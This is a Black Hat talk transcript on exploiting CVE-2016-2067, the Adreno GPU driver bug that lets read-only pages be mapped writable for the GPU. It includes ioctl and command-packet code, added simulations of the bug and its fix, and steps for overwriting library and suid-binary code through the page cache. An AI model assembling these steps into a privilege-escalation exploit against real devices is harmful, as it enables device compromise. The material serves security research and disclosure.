GPU Security Exposed - Black Hat Briefings
TRANSCRIPT
GPU Security Exposed: Exploiting Shared Memory
Justin Taft
Presentation Overview
Shared Memory Internals
GPU Command Processor
Exploiting CVE-2016-2067
Shared Memory
In software terms, it's a region of physical memory shared by two or more processes.
In hardware terms, it's a region of physical memory shared by two or more hardware components.
Shared Memory - Hardware Overview
Memory Management Unit (MMU)
Hardware component the CPU interacts with when accessing memory.
Translates virtual addresses to physical addresses.
Enforces page table entry flags (read/write, execute, etc.).
Input Output Memory Management Unit (IOMMU)
Hardware component the GPU interacts with when accessing memory.
Can be configured to map an address range to system memory (RAM) used by the CPU.
Prevents Direct Memory Access (DMA) attacks by limiting what memory the GPU can access, and with which permissions.
That protection is only as good as the mappings the driver programs into it.
Sharing Memory with the Adreno GPU
Interfacing with the Graphics Driver
Driver interface exposed through the device file /dev/kgsl-3d0.
Commands are issued via ioctl() calls.
The device file is world readable and writable, so any unprivileged process can reach the driver.
Creating a Shared Memory Mapping

    struct kgsl_map_user_mem sharedMemory = {
        .hostptr = dataToShare,             // MUST BE PAGE ALIGNED
        .len     = pageSize,                // MUST BE A MULTIPLE OF THE PAGE LENGTH
        .memtype = KGSL_USER_MEM_TYPE_ADDR, // MEMORY PAGE BEING MAPPED IS ALREADY OWNED BY THE USER PROCESS
        .gpuaddr = 0,                       // UPDATED BY THE IOCTL CALL
    };
    ioctl(kgsl3dfd, IOCTL_KGSL_MAP_USER_MEM, &sharedMemory);
GPU Command Processor
GPU Command Processor
Processes instructions in order to draw graphics and configure internal settings of the GPU.
Higher level APIs (OpenGL) provide an abstraction over these implementation details.
Command Processor instructions are not standardized; they differ between vendors and GPU generations.
Writing to GPU Memory from the Command Processor

    #define ADD_CMD(x) do { *cmdsPtr++ = (x); cmdCount++; } while (0)

    // A page-sized, page-aligned buffer: it is shared with the GPU through
    // IOCTL_KGSL_MAP_USER_MEM like any other page, and that mapping's gpuaddr
    // is what the submission on the next slide points the GPU at.
    unsigned int cmdCount = 0;
    unsigned int* cmdsStart = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                                   MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    unsigned int* cmdsPtr = cmdsStart;

    // Macros defined by the driver. cp_type3_packet does some bit shifting and flipping.
    ADD_CMD(cp_type3_packet(CP_MEM_WRITE, 2));
    ADD_CMD(targetGpuAddress); // GPU address to write to
    ADD_CMD(0xaabbccdd);       // Value to write
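The slide only calls cp_type3_packet; the following added example (not from the talk) spells out what that macro produces and what the command processor does with it, using the type-3 packet layout and the CP_MEM_WRITE opcode as defined in the msm kgsl driver's adreno_pm4types.h. The command processor itself is replaced by a small hypothetical model that decodes headers and performs the store into a simulated GPU address window, so the stream can be inspected on any machine; gpu_base and the target address are made-up values.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Type-3 packet encoding from the msm kgsl driver's adreno_pm4types.h
 * (the slide only invokes the macro; the constants are reproduced here).
 * Header: bits 31:30 = 3 (type-3), bits 29:16 = payload dwords minus one,
 * bits 15:8 = opcode. CP_MEM_WRITE (0x3d) takes a GPU address followed by
 * the dwords to store there. */
#define CP_TYPE3_PKT ((uint32_t)3 << 30)
#define CP_MEM_WRITE 0x3d
#define cp_type3_packet(opcode, cnt) \
    (CP_TYPE3_PKT | ((((uint32_t)(cnt)) - 1) << 16) | (((uint32_t)(opcode) & 0xff) << 8))

/* Same stream as the slide: one CP_MEM_WRITE of one dword. Returns dwords used. */
size_t build_mem_write(uint32_t *cmds, uint32_t gpuaddr, uint32_t value)
{
    size_t n = 0;
    cmds[n++] = cp_type3_packet(CP_MEM_WRITE, 2); /* two payload dwords follow */
    cmds[n++] = gpuaddr;                           /* GPU address to write to */
    cmds[n++] = value;                             /* value to write */
    return n;
}

/* Hypothetical command-processor model: decodes type-3 headers and executes
 * CP_MEM_WRITE against a simulated GPU address window [gpu_base, gpu_base +
 * 4 * gpu_mem_dwords). Other opcodes are skipped by their count. Returns the
 * number of dwords stored, or -1 for a malformed or out-of-window stream. */
long simulate_cp(const uint32_t *cmds, size_t ndwords,
                 uint32_t *gpu_mem, size_t gpu_mem_dwords, uint32_t gpu_base)
{
    long written = 0;
    size_t i = 0;
    while (i < ndwords) {
        uint32_t hdr = cmds[i];
        if ((hdr >> 30) != 3)
            return -1;                            /* only type-3 modelled */
        uint32_t count  = ((hdr >> 16) & 0x3fff) + 1;
        uint32_t opcode = (hdr >> 8) & 0xff;
        if (i + 1 + count > ndwords)
            return -1;                            /* truncated packet */
        if (opcode == CP_MEM_WRITE) {
            if (count < 2)
                return -1;                        /* address but no data */
            uint32_t addr = cmds[i + 1];
            if (addr < gpu_base || (addr & 3))
                return -1;
            for (uint32_t k = 0; k + 1 < count; k++) {
                uint32_t off = (addr - gpu_base) / 4 + k;
                if (off >= gpu_mem_dwords)
                    return -1;                    /* outside the mapped window */
                gpu_mem[off] = cmds[i + 2 + k];
                written++;
            }
        }
        i += 1 + count;
    }
    return written;
}

/* End-to-end: build the slide's packet, run it through the model, and return
 * what landed at the target address (0xaabbccdd if the write took effect). */
uint32_t demo_mem_write(void)
{
    uint32_t cmds[8];
    uint32_t gpu_mem[16] = {0};               /* simulated shared page */
    const uint32_t gpu_base = 0x40001000;     /* assumed GPU VA of the page */
    const uint32_t target   = gpu_base + 8;   /* third dword of the page */
    size_t n = build_mem_write(cmds, target, 0xaabbccdd);
    if (simulate_cp(cmds, n, gpu_mem, 16, gpu_base) != 1)
        return 0;
    return gpu_mem[2];
}

/* A header whose payload count runs past the end of the buffer must be rejected. */
long demo_truncated(void)
{
    uint32_t cmds[1] = { cp_type3_packet(CP_MEM_WRITE, 2) };
    uint32_t gpu_mem[16] = {0};
    return simulate_cp(cmds, 1, gpu_mem, 16, 0x40001000);
}

int main(void)
{
    printf("header = 0x%08x\n", (unsigned)cp_type3_packet(CP_MEM_WRITE, 2));
    printf("landed = 0x%08x\n", (unsigned)demo_mem_write());
    printf("truncated stream -> %ld\n", demo_truncated());
    return 0;
}
```

The bounds checks in simulate_cp are the model's, not the hardware's: on a real part the only thing standing between a CP_MEM_WRITE and physical memory is the IOMMU page table the driver set up, which is exactly why the mapping bug on the following slides matters.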
Sending the Commands

    struct kgsl_drawctxt_create ctxt = {
        .flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC,
        .drawctxt_id = 0,
    };
    int ret = ioctl(kgsl3dfd, IOCTL_KGSL_DRAWCTXT_CREATE, &ctxt);

    // mapping: the kgsl_map_user_mem entry created for the command buffer
    struct kgsl_ibdesc ibdesc = {
        .gpuaddr = mapping.gpuaddr,
        .sizedwords = cmdsPtr - cmdsStart,
    };

    struct kgsl_ringbuffer_issueibcmds ibcmds = {
        .drawctxt_id = ctxt.drawctxt_id,
        .ibdesc_addr = (unsigned int) &ibdesc,
        .numibs = 1,
        .flags = KGSL_CONTEXT_SUBMIT_IB_LIST,
        .timestamp = 0,
    };
    ioctl(kgsl3dfd, IOCTL_KGSL_RINGBUFFER_ISSUEIBCMDS, &ibcmds);
The Vulnerability
CVE-2016-2067
The Adreno graphics driver maps memory pages marked as read-only by the CPU as writable by the GPU.
Read/Write Permission Check

    static int memdesc_sg_virt(struct kgsl_memdesc *memdesc, struct file *vmfile)
    {
        ...
        // BUG: Check is inverted. Write access is interpreted as read access.
        int write = (memdesc->flags & KGSL_MEMFLAGS_GPUREADONLY) != 0;
        ...
        // Pin memory in place, verify write permissions.
        npages = get_user_pages(current, current->mm, memdesc->useraddr,
                                sglen, write, 0, pages, NULL);
        ret = (npages < 0) ? (int)npages : 0;
        ...
        return ret;
    }

Net effect: when the caller asks for a GPU-writable mapping (KGSL_MEMFLAGS_GPUREADONLY clear), write is 0, so get_user_pages() only verifies that the pages are readable. A read-only CPU mapping therefore passes, and the IOMMU configuration on the next slide goes on to map those same pages writable for the GPU.
IOMMU Configuration

    static int kgsl_iommu_map(struct kgsl_pagetable *pt, struct kgsl_memdesc *memdesc)
    {
        int ret = 0;
        unsigned int protflags;
        ...
        /* Set up the protection for the page(s) */
        protflags = IOMMU_READ;
        if (!(memdesc->flags & KGSL_MEMFLAGS_GPUREADONLY))
            protflags |= IOMMU_WRITE;
        ...
        ret = iommu_map_range(iommu_pt->domain, iommu_virt_addr, memdesc->sg, size, protflags);
        ...
    }
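The two driver functions above decide the GPU's permissions in two different places, and the bug is that they disagree. The following added example (mine, not the driver's code) models both in user space so the disagreement can be checked on any machine: get_user_pages() is replaced by a stub that grants access only if the CPU page permissions allow it, the vulnerable and a fixed memdesc_sg_virt() are placed side by side, and gpu_exceeds_cpu() states the invariant a reviewer should check at every device-mapping site. The flag and IOMMU bit values are taken from the kernel headers but are only used symbolically; PAGE_R and PAGE_W are this model's own.

```c
#include <errno.h>
#include <stdbool.h>
#include <stdio.h>

/* Flag from the kgsl UAPI (msm_kgsl.h); value reproduced, only used as a bit. */
#define KGSL_MEMFLAGS_GPUREADONLY 0x01000000u
/* CPU page permissions of the user mapping being shared (this model's own). */
#define PAGE_R 1u
#define PAGE_W 2u
/* IOMMU protection bits (values as in linux/iommu.h). */
#define IOMMU_READ  1u
#define IOMMU_WRITE 2u

/* Model of get_user_pages(): succeeds only if the pages carry the access the
 * caller asks for. A read-only CPU mapping passes with write == 0 and fails
 * with write == 1, which is the whole point of that argument. */
static int model_get_user_pages(unsigned cpu_perms, int write)
{
    if (!(cpu_perms & PAGE_R))
        return -EFAULT;
    if (write && !(cpu_perms & PAGE_W))
        return -EFAULT;
    return 0;
}

/* kgsl_iommu_map() protection logic, as on the slide. */
unsigned iommu_protflags(unsigned memflags)
{
    unsigned protflags = IOMMU_READ;
    if (!(memflags & KGSL_MEMFLAGS_GPUREADONLY))
        protflags |= IOMMU_WRITE;
    return protflags;
}

/* Vulnerable memdesc_sg_virt(): the write argument is derived from the flag
 * backwards. Returns the IOMMU protection the GPU ends up with, or -errno. */
int map_user_mem_vulnerable(unsigned memflags, unsigned cpu_perms)
{
    int write = (memflags & KGSL_MEMFLAGS_GPUREADONLY) != 0;   /* BUG: inverted */
    int ret = model_get_user_pages(cpu_perms, write);
    if (ret)
        return ret;
    return (int)iommu_protflags(memflags);
}

/* Fixed version: ask get_user_pages() for write access exactly when the IOMMU
 * mapping will be writable, so the CPU mapping's permission is enforced. */
int map_user_mem_fixed(unsigned memflags, unsigned cpu_perms)
{
    int write = (memflags & KGSL_MEMFLAGS_GPUREADONLY) == 0;
    int ret = model_get_user_pages(cpu_perms, write);
    if (ret)
        return ret;
    return (int)iommu_protflags(memflags);
}

/* The invariant to check at every map site: the device must never get a
 * permission the owning process does not have on the same pages. */
bool gpu_exceeds_cpu(int map_result, unsigned cpu_perms)
{
    if (map_result < 0)
        return false;                  /* nothing was mapped */
    return ((unsigned)map_result & IOMMU_WRITE) && !(cpu_perms & PAGE_W);
}

int main(void)
{
    /* The attack case: a PROT_READ page (e.g. a library's text) shared with
     * GPUREADONLY clear, i.e. the caller asks for a GPU-writable mapping. */
    int v = map_user_mem_vulnerable(0, PAGE_R);
    int f = map_user_mem_fixed(0, PAGE_R);
    printf("vulnerable: result=%d gpu_exceeds_cpu=%d\n", v, gpu_exceeds_cpu(v, PAGE_R));
    printf("fixed:      result=%d (EFAULT=%d)\n", f, -EFAULT);
    return 0;
}
```

One side effect of the inversion that the model also shows: a legitimate read-only share of a read-only page (GPUREADONLY set, PROT_READ mapping) is rejected by the vulnerable code, because it then demands write access it does not need.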
The Exploit
Modifying Dynamic Libraries
Use dlopen() and dlsym() to load a dynamic library and locate symbol addresses.
The instructions at these symbols can be overwritten, for example __android_log_print in liblog.so.
Some privileged binaries are statically linked, so patching a shared library does not reach them.
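Before handing a symbol's page to the GPU, the practical check is to confirm what the CPU side is allowed to do with it and to compute the page-aligned hostptr the mapping ioctl insists on. The following added example (not from the talk) does both on Linux by parsing /proc/self/maps; it resolves a function and a variable from the program itself rather than calling dlsym() so that it does not depend on libdl, but the same lookup works on any address dlsym() returns. target_function and target_variable are stand-ins of my own.

```c
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Round an address down to its page; IOCTL_KGSL_MAP_USER_MEM requires hostptr
 * to be page aligned and len to be a multiple of the page size. */
uintptr_t page_align(uintptr_t addr)
{
    uintptr_t page = (uintptr_t)sysconf(_SC_PAGESIZE);
    return addr & ~(page - 1);
}

/* Find the CPU permissions of the mapping that contains addr by parsing
 * /proc/self/maps. On success returns 1 and stores the 4-character
 * permission field (e.g. "r-xp") in perms. Linux-only. */
int cpu_perms_of(uintptr_t addr, char perms[5])
{
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f)
        return 0;
    char line[512];
    int found = 0;
    while (fgets(line, sizeof line, f)) {
        unsigned long start, end;
        char p[5];
        if (sscanf(line, "%lx-%lx %4s", &start, &end, p) != 3)
            continue;
        if (addr >= start && addr < end) {
            memcpy(perms, p, 5);
            found = 1;
            break;
        }
    }
    fclose(f);
    return found;
}

/* Stand-ins for what an exploit would resolve with dlsym(): a function in
 * the text segment and a variable in the data segment of this program. */
int target_function(int x) { return x + 1; }
int target_variable = 42;

/* 1 if the page holding target_function is executable and not writable by
 * the CPU: the kind of page the CPU cannot patch but CVE-2016-2067 lets the
 * GPU patch. */
int target_code_is_cpu_readonly(void)
{
    char perms[5];
    if (!cpu_perms_of(page_align((uintptr_t)&target_function), perms))
        return 0;
    return perms[1] == '-' && perms[2] == 'x';
}

/* Control case: a data page is writable, so the parser really distinguishes. */
int target_data_is_cpu_writable(void)
{
    char perms[5];
    if (!cpu_perms_of(page_align((uintptr_t)&target_variable), perms))
        return 0;
    return perms[1] == 'w';
}

int main(void)
{
    char perms[5] = "????";
    uintptr_t page = page_align((uintptr_t)&target_function);
    cpu_perms_of(page, perms);
    printf("target_function page %#lx perms %s\n", (unsigned long)page, perms);
    return 0;
}
```

The page-aligned address returned by page_align() is what would go into the hostptr field of kgsl_map_user_mem; the symbol's offset within that page is what a CP_MEM_WRITE would add to the returned gpuaddr.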
We can do better…
Modifying the Disk Cache
mmap() can be used to map files into memory.
File contents are cached in memory (the page cache), and those cached pages are shared by every process that maps the same file.
By mmap()-ing a suid binary and sharing the mapping with the GPU, instructions in the privileged binary can be overwritten through the GPU, even though the CPU mapping is read-only.
The changes aren't stored to disk: they live only in the cached pages and are gone once those pages are evicted.
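The reason a GPU write to one process's read-only mapping reaches every other process is that all of them are looking at the same page-cache pages. The following added example (not from the talk) shows that sharing in plain user space on Linux: a constructed scratch file is mapped twice, read-only, once MAP_PRIVATE (as the loader maps a binary's text) and once MAP_SHARED, and the cached page is then changed through a path neither mapping controls. Here that path is pwrite(2) standing in for the GPU's DMA write; unlike the GPU write it does also reach the disk, so the example demonstrates the sharing, not the non-persistence.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Returns 1 if both a private and a shared read-only mapping of a file observe
 * a change made to the file's cached page after they were mapped, 0 if either
 * does not, -1 on a setup error. Linux-only. */
int page_cache_is_shared(void)
{
    char path[] = "/tmp/kgsl-demo-XXXXXX";     /* constructed scratch file */
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    unlink(path);                              /* no name left behind on disk */

    long page = sysconf(_SC_PAGESIZE);
    char *orig = calloc(1, (size_t)page);
    if (!orig) { close(fd); return -1; }
    memcpy(orig, "original code bytes", 19);   /* pretend: a binary's text */
    if (write(fd, orig, (size_t)page) != page) { free(orig); close(fd); return -1; }
    free(orig);

    /* What exec()/dlopen() gives a process for code: a private, read-only
     * mapping. The GPU-side mapping in the talk refers to the same physical
     * pages; a MAP_SHARED view stands in for "another user of those pages". */
    char *priv = mmap(NULL, (size_t)page, PROT_READ, MAP_PRIVATE, fd, 0);
    char *shrd = mmap(NULL, (size_t)page, PROT_READ, MAP_SHARED, fd, 0);
    if (priv == MAP_FAILED || shrd == MAP_FAILED) { close(fd); return -1; }

    /* Touch both views first so the pages are definitely mapped in. */
    volatile char first_priv = priv[0], first_shrd = shrd[0];
    (void)first_priv; (void)first_shrd;

    /* Modify the cached page behind the mappings' back. Neither mapping is
     * writable from the CPU, yet both see the new bytes afterwards. */
    const char patch[] = "patched  code bytes";
    size_t plen = sizeof patch - 1;
    if (pwrite(fd, patch, plen, 0) != (ssize_t)plen) {
        munmap(priv, (size_t)page); munmap(shrd, (size_t)page); close(fd);
        return -1;
    }

    int ok = memcmp(priv, patch, plen) == 0 && memcmp(shrd, patch, plen) == 0;

    munmap(priv, (size_t)page);
    munmap(shrd, (size_t)page);
    close(fd);
    return ok;
}

int main(void)
{
    printf("page cache shared across mappings: %d\n", page_cache_is_shared());
    return 0;
}
```

Two caveats that carry over to the real attack. A MAP_PRIVATE page stays shared with the page cache only until the mapping process writes to it and gets a private copy, which a read-only text mapping never does; and because the GPU path writes the physical page directly rather than through the file, the kernel never sees a dirty page and never writes it back, which is why the slide's changes are not stored to disk.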
Demonstration
Takeaways
Shared memory is hard to get right.
Direct memory access attacks are very powerful.
Graphics stacks have a large attack surface.
References
"Understanding Modern GPUs" (Óscar Blasco Maestro), https://traxnet.wordpress.com/2011/07/16/understanding-modern-gpus-1/
"ARM, DMA, and memory management" (Jonathan Corbet), https://lwn.net/Articles/440221/
http://nommu.org/memory-faq.txt